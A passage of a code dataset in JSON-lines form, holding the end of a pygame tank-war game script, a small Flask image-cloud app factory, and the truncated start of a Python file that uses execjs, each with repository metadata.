allTankGroup.remove(myTank_T1)\n if myTank_T1.moveDown(allTankGroup, bgMap.brickGroup, bgMap.ironGroup, bgMap.all_sprites):\n moving += 1\n allTankGroup.add(myTank_T1)\n running_T1 = True\n if movdir == 2:\n allTankGroup.remove(myTank_T1)\n if myTank_T1.moveLeft(allTankGroup, bgMap.brickGroup, bgMap.ironGroup, bgMap.all_sprites):\n moving += 1\n allTankGroup.add(myTank_T1)\n running_T1 = True\n if movdir == 3:\n allTankGroup.remove(myTank_T1)\n if myTank_T1.moveRight(allTankGroup, bgMap.brickGroup, bgMap.ironGroup, bgMap.all_sprites):\n moving += 1\n allTankGroup.add(myTank_T1)\n running_T1 = True\n\n if not moving:\n if key_pressed[pygame.K_UP]: # 上鍵向上移動\n moving = 7\n movdir = 0\n running_T1 = True\n allTankGroup.remove(myTank_T1)\n if myTank_T1.moveUp(allTankGroup, bgMap.brickGroup, bgMap.ironGroup, bgMap.all_sprites):\n moving = 0\n allTankGroup.add(myTank_T1)\n elif key_pressed[pygame.K_DOWN]: # 下鍵向下移動\n moving = 7\n movdir = 1\n running_T1 = True\n allTankGroup.remove(myTank_T1)\n if myTank_T1.moveDown(allTankGroup, bgMap.brickGroup, bgMap.ironGroup, bgMap.all_sprites):\n moving = 0\n allTankGroup.add(myTank_T1)\n elif key_pressed[pygame.K_LEFT]: # 左鍵向左移動\n moving = 7\n movdir = 2\n running_T1 = True\n allTankGroup.remove(myTank_T1)\n if myTank_T1.moveLeft(allTankGroup, bgMap.brickGroup, bgMap.ironGroup, bgMap.all_sprites):\n moving = 0\n allTankGroup.add(myTank_T1)\n elif key_pressed[pygame.K_RIGHT]: # 右鍵向右移動\n moving = 7\n movdir = 3\n running_T1 = True\n allTankGroup.remove(myTank_T1)\n if myTank_T1.moveRight(allTankGroup, bgMap.brickGroup, bgMap.ironGroup, bgMap.all_sprites):\n moving = 0\n allTankGroup.add(myTank_T1)\n # 射擊\n if key_pressed[pygame.K_SPACE]: # 空白鍵射擊\n if not myTank_T1.bullet.life and myTank_T1.bulletNotCooling:\n fire_sound.play()\n myTank_T1.shoot()\n myTank_T1.bulletNotCooling = False\n\n # 畫我方坦克\n if not (delay % 5):\n switch_R1_R2_image = not switch_R1_R2_image\n if switch_R1_R2_image and running_T1:\n screen.blit(myTank_T1.tank_R0,\n (myTank_T1.rect.left, myTank_T1.rect.top))\n running_T1 = False\n else:\n screen.blit(myTank_T1.tank_R1,\n (myTank_T1.rect.left, myTank_T1.rect.top))\n\n # 畫敵方坦克\n for each in allEnemyGroup:\n # 判斷特效是否播放\n if each.flash:\n # 判斷畫左動作還是右動作\n if switch_R1_R2_image:\n screen.blit(each.tank_R0, (each.rect.left, each.rect.top))\n if enemyCouldMove:\n allTankGroup.remove(each)\n each.move(allTankGroup, bgMap.brickGroup,\n bgMap.ironGroup, all_sprites)\n allTankGroup.add(each)\n else:\n screen.blit(each.tank_R1, (each.rect.left, each.rect.top))\n if enemyCouldMove:\n allTankGroup.remove(each)\n each.move(allTankGroup, bgMap.brickGroup,\n bgMap.ironGroup, all_sprites)\n allTankGroup.add(each)\n else:\n # 播放敵方坦克出場特效\n if each.times > 0:\n each.times -= 1\n if each.times <= 10:\n screen.blit(appearance[2], (3 + each.x * 12 * 15, 3))\n elif each.times <= 20:\n screen.blit(appearance[1], (3 + each.x * 12 * 15, 3))\n elif each.times <= 30:\n screen.blit(appearance[0], (3 + each.x * 12 * 15, 3))\n elif each.times <= 40:\n screen.blit(appearance[2], (3 + each.x * 12 * 15, 3))\n elif each.times <= 50:\n screen.blit(appearance[1], (3 + each.x * 12 * 15, 3))\n elif each.times <= 60:\n screen.blit(appearance[0], (3 + each.x * 12 * 15, 3))\n elif each.times <= 70:\n screen.blit(appearance[2], (3 + each.x * 12 * 15, 3))\n elif each.times <= 80:\n screen.blit(appearance[1], (3 + each.x * 12 * 15, 3))\n elif each.times <= 90:\n screen.blit(appearance[0], (3 + each.x * 12 * 15, 3))\n if each.times == 0:\n each.flash = True\n\n # 繪製我方子彈\n if myTank_T1.bullet.life:\n myTank_T1.bullet.move()\n screen.blit(myTank_T1.bullet.bullet, myTank_T1.bullet.rect)\n\n # 子彈 碰撞子彈\n for each in enemyBulletGroup:\n if each.life:\n if pygame.sprite.collide_rect(myTank_T1.bullet, each):\n myTank_T1.bullet.life = False\n each.life = False\n pygame.sprite.spritecollide(\n myTank_T1.bullet, enemyBulletGroup, True, None)\n\n # 子彈 碰撞敵方坦克\n if pygame.sprite.spritecollide(myTank_T1.bullet, redEnemyGroup, False, None):\n prop.change()\n bang_sound.play()\n enemyNumber -= 1\n # hits為發生碰撞的位置列表\n hits = pygame.sprite.spritecollide( # 如果子彈碰到敵方紅色坦克,爆炸動畫\n myTank_T1.bullet, redEnemyGroup, True)\n for hit in hits:\n expl = Explosion(hit.rect.center, 'enemy_tank')\n explosionList.append(expl)\n myTank_T1.bullet.life = False\n if enemyNumber == 0:\n # time.sleep(0.5)\n running = False\n elif pygame.sprite.spritecollide(myTank_T1.bullet, greenEnemyGroup, False, None):\n for each in greenEnemyGroup:\n if pygame.sprite.collide_rect(myTank_T1.bullet, each):\n if each.life == 1:\n bang_sound.play()\n enemyNumber -= 1\n expl = Explosion(each.rect.center, 'enemy_tank')\n each.kill()\n explosionList.append(expl)\n each.life -= 1\n if enemyNumber == 0:\n # time.sleep(0.5)\n running = False\n elif each.life == 2:\n each.life -= 1\n myTank_T1.bullet.life = False\n elif pygame.sprite.spritecollide(myTank_T1.bullet, otherEnemyGroup, False, None):\n bang_sound.play()\n enemyNumber -= 1\n hits = pygame.sprite.spritecollide(\n myTank_T1.bullet, otherEnemyGroup, True)\n for hit in hits:\n expl = Explosion(hit.rect.center, 'enemy_tank')\n explosionList.append(expl)\n myTank_T1.bullet.life = False\n if enemyNumber == 0:\n # time.sleep(0.5)\n running = False\n\n # 子弹 碰撞 brickGroup\n if pygame.sprite.spritecollide(myTank_T1.bullet, bgMap.brickGroup, True, None):\n myTank_T1.bullet.life = False\n myTank_T1.bullet.rect.left, myTank_T1.bullet.rect.right = 3 + 12 * 24, 3 + 24 * 24\n\n # 子弹 碰撞 ironGroup\n if myTank_T1.bullet.strong:\n if pygame.sprite.spritecollide(myTank_T1.bullet, bgMap.ironGroup, True, None):\n myTank_T1.bullet.life = False\n myTank_T1.bullet.rect.left, myTank_T1.bullet.rect.right = 3 + 12 * 24, 3 + 24 * 24\n else:\n if pygame.sprite.spritecollide(myTank_T1.bullet, bgMap.ironGroup, False, None):\n myTank_T1.bullet.life = False\n myTank_T1.bullet.rect.left, myTank_T1.bullet.rect.right = 3 + 12 * 24, 3 + 24 * 24\n\n # 子弹 碰撞 base\n if pygame.sprite.spritecollide(myTank_T1.bullet, bgMap.all_sprites, False, None):\n myTank_T1.bullet.life = False\n myTank_T1.bullet.rect.left, myTank_T1.bullet.rect.right = 3 + 12 * 24, 3 + 24 * 24\n\n # 繪製敵人子彈\n for each in allEnemyGroup:\n # 如果子彈没有生命,就賦予子彈生命\n if not each.bullet.life and each.bulletNotCooling and enemyCouldMove:\n enemyBulletGroup.remove(each.bullet)\n each.shoot()\n enemyBulletGroup.add(each.bullet)\n each.bulletNotCooling = False\n # 如果特效播放完畢 並且 子彈存活 則繪製敵方子彈\n if each.flash:\n if each.bullet.life:\n # 如果敵方可以移動\n if enemyCouldMove:\n each.bullet.move()\n screen.blit(each.bullet.bullet, each.bullet.rect)\n\n # 敵方子彈 碰撞 我方坦克\n if pygame.sprite.collide_rect(each.bullet, myTank_T1):\n bang_sound.play()\n myTank_T1.life -= 1\n death_expl = Explosion(\n myTank_T1.rect.center, 'my_tank')\n explosionList.append(death_expl)\n hide(myTank_T1)\n myTank_T1.rect.left, myTank_T1.rect.top = 3 + 8 * 24, 3 + 24 * 24\n each.bullet.life = False\n moving = 0 # 重置移動控制參數\n\n # 子彈 碰撞brickGroup\n if pygame.sprite.spritecollide(each.bullet, bgMap.brickGroup, True, None):\n each.bullet.life = False\n\n # 子彈 碰撞homeGroup\n if pygame.sprite.spritecollide(each.bullet, bgMap.all_sprites, False, None):\n myTank_T1.bullet.life = False\n myTank_T1.bullet.rect.left, myTank_T1.bullet.rect.right = 3 + 12 * 24, 3 + 24 * 24\n hits = pygame.sprite.spritecollide(\n each.bullet, bgMap.all_sprites, False, None)\n for hit in hits:\n base.health -= 20\n if base.health <= 0:\n show_init = True\n all_sprites.update()\n\n # 子彈 碰撞ironGroup\n if each.bullet.strong:\n if pygame.sprite.spritecollide(each.bullet, bgMap.ironGroup, True, None):\n each.bullet.life = False\n else:\n if pygame.sprite.spritecollide(each.bullet, bgMap.ironGroup, False, None):\n each.bullet.life = False\n\n # 食物/道具部分\n if prop.life:\n screen.blit(prop.image, prop.rect)\n\n # 我方坦克碰撞 食物/道具\n if pygame.sprite.collide_rect(myTank_T1, prop):\n if prop.kind == 1: # 敵人全毀\n for each in allEnemyGroup:\n if pygame.sprite.spritecollide(each, allEnemyGroup, True, None):\n bang_sound.play()\n enemyNumber -= 1\n prop.life = False\n if prop.kind == 2: # 敵人静止\n enemyCouldMove = False\n prop.life = False\n if prop.kind == 3: # 子弹增强\n myTank_T1.bullet.strong = True\n prop.life = False\n if prop.kind == 4: # 大本營得到保護\n for x, y in [(11, 23), (12, 23), (13, 23), (14, 23), (11, 24), (14, 24), (11, 25), (14, 25)]:\n bgMap.iron = wall.Iron()\n bgMap.iron.rect.left, bgMap.iron.rect.top = 3 + x * 24, 3 + y * 24\n bgMap.ironGroup.add(bgMap.iron)\n prop.life = False\n if prop.kind == 5: # 坦克無敵\n prop.life = False\n pass\n if prop.kind == 6: # 坦克生命+1\n if myTank_T1.life < 3:\n myTank_T1.life += 1\n else:\n myTank_T1.life = 3\n prop.life = False\n\n # 生命歸0,遊戲結束\n if myTank_T1.life == 0:\n running = False\n if base.health == 0:\n running = False\n\n # 延遲\n delay -= 1\n if not delay:\n delay = 100\n\n pygame.display.flip()\n clock.tick(60)\n\n\npygame.init()\nWIDTH = 630\nHEIGHT = 630\nGREEN = (0, 255, 0)\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nscreen = pygame.display.set_mode((WIDTH, HEIGHT))\nclock = pygame.time.Clock()\npygame.display.set_caption(\"TANK\")\n\nbackground_jpg = pygame.image.load(\n os.path.join(\"image\", \"background_revise.jpg\")).convert()\n\nfont_name = pygame.font.match_font(\"arial\")\n\n\ndef draw_text(surf, text, size, x, y):\n font = pygame.font.Font(font_name, size)\n text_surface = font.render(text, True, WHITE)\n text_rect = text_surface.get_rect()\n text_rect.centerx = x\n text_rect.top = y\n surf.blit(text_surface, text_rect)\n\n\ndef draw_init():\n screen.blit(background_jpg, (0, 0))\n draw_text(screen, \"NTU Tank War\", 64, WIDTH/2, HEIGHT/6)\n draw_text(screen, \"Shoot = Space, Move = Arrow keys\",\n 32, WIDTH/2, HEIGHT/2)\n draw_text(screen, \"Press any button to start\",\n 26, WIDTH/2, HEIGHT*(5/6))\n pygame.display.update()\n wating = True\n while wating:\n clock.tick(FPS)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n elif event.type == pygame.KEYUP:\n wating = False\n\n\ndef draw_health(surf, hp, x, y):\n if hp < 0:\n hp = 0\n BAR_LENGTH = 100\n BAR_HEIGHT = 10\n fill = (hp/100)*BAR_LENGTH\n outline_rect = pygame.Rect(x, y, BAR_LENGTH, BAR_HEIGHT)\n fill_rect = pygame.Rect(x, y, fill, BAR_HEIGHT)\n pygame.draw.rect(surf, GREEN, fill_rect)\n pygame.draw.rect(surf, WHITE, outline_rect, 2)\n\n\nclass Base(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.Surface((100, 150))\n self.image.fill(WHITE)\n self.rect = self.image.get_rect()\n self.rect.center = (WIDTH/2, 630)\n self.health = 100\n\n\nall_sprites = pygame.sprite.Group()\nbase = Base()\nall_sprites.add(base)\n\nFPS = 60\nshow_init = True\n\nif show_init:\n draw_init()\n show_init = False\nclock.tick(FPS)\nfor event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n\nscreen.fill(BLACK)\nscreen.blit(background_jpg, (0, 0))\nall_sprites.draw(screen)\ndraw_health(screen, base.health, 520, 15)\npygame.display.update()\n\nif __name__ == \"__main__\":\n try:\n main(\"map.png\", 1)\n except SystemExit:\n pass\n except:\n traceback.print_exc()\n pygame.quit()\n input()\n time.sleep(2)\n try:\n main(\"socialscience_back.png\", 2)\n except SystemExit:\n pass\n except:\n traceback.print_exc()\n pygame.quit()\n input()\npygame.quit()\n", "repo_name": "deankuo/PBC-Final-Project", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 25340, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "pygame.init", "line_number": 16, "usage_type": "call"}, {"api_name": "pygame.mixer.init", "line_number": 17, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 17, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 21, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 21, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 22, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 22, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 25, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 25, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 27, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 27, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 30, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 33, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 33, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path", "line_number": 33, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 34, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 34, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "pygame.Rect", "line_number": 43, "usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 44, "usage_type": "call"}, {"api_name": "pygame.draw.rect", "line_number": 45, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 45, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 46, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 46, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 48, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Sprite.__init__", "line_number": 50, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 50, "usage_type": "attribute"}, {"api_name": "pygame.Surface", "line_number": 51, "usage_type": "call"}, {"api_name": "pygame.sprite.Group", "line_number": 57, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 57, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 65, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 65, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 66, "usage_type": "call"}, {"api_name": "os.path", "line_number": 66, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 69, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 69, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 70, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 70, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 71, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 71, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path", "line_number": 72, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 74, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 74, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path", "line_number": 74, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 76, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 76, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 76, "usage_type": "call"}, {"api_name": "os.path", "line_number": 76, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 77, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 77, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 77, "usage_type": "call"}, {"api_name": "os.path", "line_number": 77, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 81, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 81, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 82, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 82, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 83, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 83, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 84, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 84, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 85, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 85, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 86, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 86, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 87, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 87, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 99, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Sprite.__init__", "line_number": 101, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 101, "usage_type": "attribute"}, {"api_name": "pygame.time.get_ticks", "line_number": 107, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 107, "usage_type": "attribute"}, {"api_name": "pygame.time.get_ticks", "line_number": 112, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 112, "usage_type": "attribute"}, {"api_name": "pygame.time.get_ticks", "line_number": 130, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 130, "usage_type": "attribute"}, {"api_name": "wall.Map", "line_number": 135, "usage_type": "call"}, {"api_name": "wall2.Map", "line_number": 137, "usage_type": "call"}, {"api_name": "food.Food", "line_number": 140, "usage_type": "call"}, {"api_name": "myTank.MyTank", "line_number": 143, "usage_type": "call"}, {"api_name": "enemyTank.EnemyTank", "line_number": 149, "usage_type": "call"}, {"api_name": "pygame.image.load", "line_number": 162, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 162, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 163, "usage_type": "call"}, {"api_name": "os.path", "line_number": 163, "usage_type": "attribute"}, {"api_name": "pygame.constants", "line_number": 171, "usage_type": "attribute"}, {"api_name": "pygame.time.set_timer", "line_number": 172, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 172, "usage_type": "attribute"}, {"api_name": "pygame.constants", "line_number": 174, "usage_type": "attribute"}, {"api_name": "pygame.time.set_timer", "line_number": 175, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 175, "usage_type": "attribute"}, {"api_name": "pygame.constants", "line_number": 177, "usage_type": "attribute"}, {"api_name": "pygame.time.set_timer", "line_number": 178, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 178, "usage_type": "attribute"}, {"api_name": "pygame.constants", "line_number": 180, "usage_type": "attribute"}, {"api_name": "pygame.time.set_timer", "line_number": 181, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 181, "usage_type": "attribute"}, {"api_name": "pygame.time.Clock", "line_number": 192, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 192, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 221, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 221, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 222, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 223, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 224, "usage_type": "call"}, {"api_name": "pygame.KEYDOWN", "line_number": 249, "usage_type": "attribute"}, {"api_name": "pygame.K_x", "line_number": 250, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 251, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 252, "usage_type": "call"}, {"api_name": "pygame.key.get_pressed", "line_number": 255, "usage_type": "call"}, {"api_name": "pygame.key", "line_number": 255, "usage_type": "attribute"}, {"api_name": "pygame.K_UP", "line_number": 286, "usage_type": "attribute"}, {"api_name": "pygame.K_DOWN", "line_number": 294, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 302, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 310, "usage_type": "attribute"}, {"api_name": "pygame.K_SPACE", "line_number": 319, "usage_type": "attribute"}, {"api_name": "pygame.sprite.collide_rect", "line_number": 388, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 388, "usage_type": "attribute"}, {"api_name": "pygame.sprite.spritecollide", "line_number": 391, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 391, "usage_type": "attribute"}, {"api_name": "pygame.sprite.spritecollide", "line_number": 395, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 395, "usage_type": "attribute"}, {"api_name": "pygame.sprite.spritecollide", "line_number": 400, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 400, "usage_type": "attribute"}, {"api_name": "pygame.sprite.spritecollide", "line_number": 409, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 409, "usage_type": "attribute"}, {"api_name": "pygame.sprite.collide_rect", "line_number": 411, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 411, "usage_type": "attribute"}, {"api_name": "pygame.sprite.spritecollide", "line_number": 425, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 425, "usage_type": "attribute"}, {"api_name": "pygame.sprite.spritecollide", "line_number": 428, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 428, "usage_type": "attribute"}, {"api_name": "pygame.sprite.spritecollide", "line_number": 439, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 439, "usage_type": "attribute"}, {"api_name": "pygame.sprite.spritecollide", "line_number": 445, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 445, "usage_type": "attribute"}, {"api_name": "pygame.sprite.spritecollide", "line_number": 449, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 449, "usage_type": "attribute"}, {"api_name": "pygame.sprite.spritecollide", "line_number": 454, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 454, "usage_type": "attribute"}, {"api_name": "pygame.sprite.collide_rect", "line_number": 475, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 475, "usage_type": "attribute"}, {"api_name": "pygame.sprite.spritecollide", "line_number": 487, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 487, "usage_type": "attribute"}, {"api_name": "pygame.sprite.spritecollide", "line_number": 491, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 491, "usage_type": "attribute"}, {"api_name": "pygame.sprite.spritecollide", "line_number": 494, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 494, "usage_type": "attribute"}, {"api_name": "pygame.sprite.spritecollide", "line_number": 504, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 504, "usage_type": "attribute"}, {"api_name": "pygame.sprite.spritecollide", "line_number": 507, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 507, "usage_type": "attribute"}, {"api_name": "pygame.sprite.collide_rect", "line_number": 515, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 515, "usage_type": "attribute"}, {"api_name": "pygame.sprite.spritecollide", "line_number": 518, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 518, "usage_type": "attribute"}, {"api_name": "wall.Iron", "line_number": 530, "usage_type": "call"}, {"api_name": "pygame.display.flip", "line_number": 555, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 555, "usage_type": "attribute"}, {"api_name": "pygame.init", "line_number": 559, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 565, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 565, "usage_type": "attribute"}, {"api_name": "pygame.time.Clock", "line_number": 566, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 566, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 567, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 567, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 569, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 569, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 570, "usage_type": "call"}, {"api_name": "os.path", "line_number": 570, "usage_type": "attribute"}, {"api_name": "pygame.font.match_font", "line_number": 572, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 572, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 576, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 576, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 591, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 591, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 595, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 595, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 596, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 597, "usage_type": "call"}, {"api_name": "pygame.KEYUP", "line_number": 598, "usage_type": "attribute"}, {"api_name": "pygame.Rect", "line_number": 608, "usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 609, "usage_type": "call"}, {"api_name": "pygame.draw.rect", "line_number": 610, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 610, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 611, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 611, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 614, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Sprite.__init__", "line_number": 616, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 616, "usage_type": "attribute"}, {"api_name": "pygame.Surface", "line_number": 617, "usage_type": "call"}, {"api_name": "pygame.sprite.Group", "line_number": 624, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 624, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 635, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 635, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 636, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 643, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 643, "usage_type": "attribute"}, {"api_name": "traceback.print_exc", "line_number": 651, "usage_type": "call"}, {"api_name": "pygame.quit", "line_number": 652, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 654, "usage_type": "call"}, {"api_name": "traceback.print_exc", "line_number": 660, "usage_type": "call"}, {"api_name": "pygame.quit", "line_number": 661, "usage_type": "call"}, {"api_name": "pygame.quit", "line_number": 663, "usage_type": "call"}]} +{"seq_id": "35549558770", "text": "from flask import Flask\nfrom flask_cors import CORS\nfrom sqlalchemy import create_engine\nfrom model import UserDao,ImageDao\nfrom service import UserService,ImageService\nfrom view import user_router,image_router\nimport config\n\nclass Services:\n pass\n\ndef create_app(test_config=None):\n app=Flask(__name__)\n\n CORS(app)\n \n if test_config is None:\n app.config.from_pyfile(\"config.py\")\n\n else:\n app.config.update(test_config)\n \n database=create_engine(config.config['DB_URL'],encoding='utf-8',max_overflow=0)\n print(\"데이터베이스 연결 성공!\")\n \n @app.route(\"/ping\",methods=[\"GET\"])\n def ping():\n return \"pong\",200\n \n user_dao=UserDao(database)\n image_dao=ImageDao(database)\n\n services=Services\n \n services.user_service=UserService(user_dao,config=app.config)\n services.image_service=ImageService(image_dao,config=app.config)\n\n user_router(app,services)\n image_router(app,services)\n \n\n @app.route(\"/ping\",methods=[\"GET\"])\n def ping():\n return \"pong\",200\n \n return app\n", "repo_name": "Nliker/image_cloud", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 1077, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "flask.Flask", "line_number": 13, "usage_type": "call"}, {"api_name": "flask_cors.CORS", "line_number": 15, "usage_type": "call"}, {"api_name": "sqlalchemy.create_engine", "line_number": 23, "usage_type": "call"}, {"api_name": "config.config", "line_number": 23, "usage_type": "attribute"}, {"api_name": "model.UserDao", "line_number": 30, "usage_type": "call"}, {"api_name": "model.ImageDao", "line_number": 31, "usage_type": "call"}, {"api_name": "service.UserService", "line_number": 35, "usage_type": "call"}, {"api_name": "service.ImageService", "line_number": 36, "usage_type": "call"}, {"api_name": "view.user_router", "line_number": 38, "usage_type": "call"}, {"api_name": "view.image_router", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "29893634617", "text": "# -*- coding = utf-8 -*-\n# @Time: 2022/8/17 22:21\nimport execjs\nimport os\n\n\nos.environ[\"NODE_PATH\"] = 